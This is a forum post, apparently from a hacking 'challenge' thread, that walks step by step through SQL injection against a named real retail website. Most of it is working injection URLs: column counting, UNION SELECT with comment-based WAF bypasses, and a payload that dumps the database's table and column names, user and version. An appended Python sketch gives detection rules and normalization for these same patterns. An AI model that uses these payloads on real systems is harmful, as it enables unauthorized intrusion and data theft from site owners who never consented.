- My Challenge link
- http://www.mmsecurity.net/forum/showthread.php?tid=8052
- Target site :: http://www.quad-hifi.co.uk/product-detail.php?pid=30
- http://www.quad-hifi.co.uk/product-detail.php?pid=30
- First, add a ' to check whether an error occurs.
- http://www.quad-hifi.co.uk/product-detail.php?pid=30'
- The page layout changes.
- Since that produced an error, fix it again.
- http://www.quad-hifi.co.uk/product-detail.php?pid=30' -- --
- http://www.quad-hifi.co.uk/product-detail.php?pid=30' order by 1-- -- no error
- http://www.quad-hifi.co.uk/product-detail.php?pid=30' order by 38-- --error
- http://www.quad-hifi.co.uk/product-detail.php?pid=30' order by 37-- --no error
- so 37 columns
- http://www.quad-hifi.co.uk/product-detail.php?pid=30' /*!50000Union*/ Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- --
- (union wafbypass)
- The vulnerable column is displayed in the title position. If it is not, you can use the 1111,2222,3333,4444,... method and look for the values in the page source.
- http://www.quad-hifi.co.uk/product-detail.php?pid=-30' /*!50000Union*/ Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,CONCAT_WS('<br>','</title></head><center><br><br><br><br>',USER/**x**/(),DATABASE/**x**/(),VERSION()),31,32,33,34,35,36,37-- -- (this is the basic statement)
- `from` is banned for us.
- So I tried a different approach.
- http://www.quad-hifi.co.uk/product-detail.php?pid=-30' and @x:=version() /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,(select concat(unhex(hex(@x)))),31,32,33,34,35,36,37-- --
- OK, that works.
- But I still could not get a DIOS out.
- The method that finally worked for me is a bit complicated. That is probably because I am quite a noob.
- I wanted to make a video solution, but I have never made one before, so please forgive me.
- http://www.quad-hifi.co.uk/product-detail.php?pid=-30' and @x:=(select export_set(5,'</title></head><br><br><br><br><br><center>',(select unhex(hex(group_concat(/*!12345table_name*/,':',/*!12345column_name*/ separator 0x3c62723e))) from /*!12345information_schema*/.columns where table_schema=unhex(hex(/*!12345database*/()))),unhex(hex(concat_ws('<br>','<b>Jerry</b>',user/**/(),database/**/(),version(),''))),2)) /*!12345Union*/ Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,@x,31,32,33,34,35,36,37-- --
- I also want to apologize again for the untidy and noobish parts of the query.
- If there are mistakes, please advise me and point them out, brothers....
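
Added example, not part of the original paste: a detection-side sketch showing why the `/*!50000Union*/` and `USER/**x**/()` forms above slip past a plain `union\s+select` filter, and how unwrapping MySQL comments before matching catches them. The rule names, function names and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*!NNNNN ... */ as SQL, so unwrap it, do not delete it.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# Ordinary /* ... */ comments act as whitespace between tokens.
PLAIN = re.compile(r"/\*.*?\*/", re.S)

# Hypothetical rule set, matched against the normalized (lowercased) query string.
RULES = {
    "order_by_probe": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion (all )?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "fingerprint_function": re.compile(r"\b(user|database|version) ?\("),
    "user_variable": re.compile(r"@\w+ ?:="),
}

def normalize(raw_query: str) -> str:
    """URL-decode, unwrap versioned comments, drop plain ones, squeeze spaces."""
    s = unquote_plus(raw_query)
    s = VERSIONED.sub(r" \1 ", s)
    s = PLAIN.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip().lower()

def detect(raw_query: str) -> set:
    """Return the names of all rules that fire on the normalized query string."""
    text = normalize(raw_query)
    return {name for name, rx in RULES.items() if rx.search(text)}

def naive_detect(raw_query: str) -> bool:
    """The kind of filter the comment trick defeats: no normalization first."""
    return re.search(r"union\s+select", raw_query, re.I) is not None

# Constructed query strings modelled on the request shapes in the paste.
SAMPLES = [
    "pid=30",
    "pid=30' order by 37-- -",
    "pid=30' /*!50000Union*/ Select 1,2,3-- -",
    "pid=-30' and @x:=version() /*!50000union*/ select 1,@x-- -",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(f"{q!r}: naive={naive_detect(q)} rules={sorted(detect(q))}")
```

Matching like this is a logging and alerting aid; the underlying fix is binding `pid` as a typed parameter in a prepared statement so the input never reaches the SQL parser as code.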